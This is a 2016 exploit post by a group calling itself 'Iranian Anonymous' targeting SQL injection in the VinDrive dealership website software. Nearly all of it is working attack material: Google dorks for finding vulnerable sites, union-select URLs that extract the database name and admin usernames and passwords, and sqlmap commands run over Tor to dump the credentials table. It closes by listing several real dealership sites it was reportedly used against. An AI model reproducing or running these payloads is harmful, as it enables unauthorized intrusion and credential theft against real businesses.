##########################
# Exploit Title: VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap
# Google Dork 1: " allinurl:search/make_offer_form.php?id= "
# Google Dork 2: " VinDrive inurl:/search/results.php "
# Google Dork 3: " inurl:results.php?_s_col=
# Script Name: VinDrive - Vehicle Marketing System - Dealership website www.dealerwebsites.com
# Data: 12-09-2016
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Tested on : Windows
##########################
######[ Exploit ]###### (( Manually ))
To See /column numbers : ( GONNA BE 3,4,5 <-- )
make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
To See /Database Name : ( Database Name will be : dealer62_XXX( SOMENAME )
make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
To See /Admin Username and Password : ( Replace XXXX with the name of data )
make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dealer62_XXXX.cars_dealers
----------- DONE -------------
######[ Exploit ]###### (( SQLMAP ))
sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs
sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -D dealer62_XXXX --tables -T cars_dealers -C username,password --dump
----------- DONE -------------
ADMIN PAGE :
http://www.TarGet/search/admin/
Enjoy !
tested on :
http://www.abcmotors.com/search/admin/
http://www.spacecoastauto.com/search/admin/
www.jclautos.com/search/admin/
www.fcautoconnection.com/search/admin/
http://www.greatlittlecars.com/search/admin/
http://www.sunshine-automotive.com/search/admin/
###################################
#Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr ||
And All Of Iranian Anonymous .
# Discovered By: Hacker Khan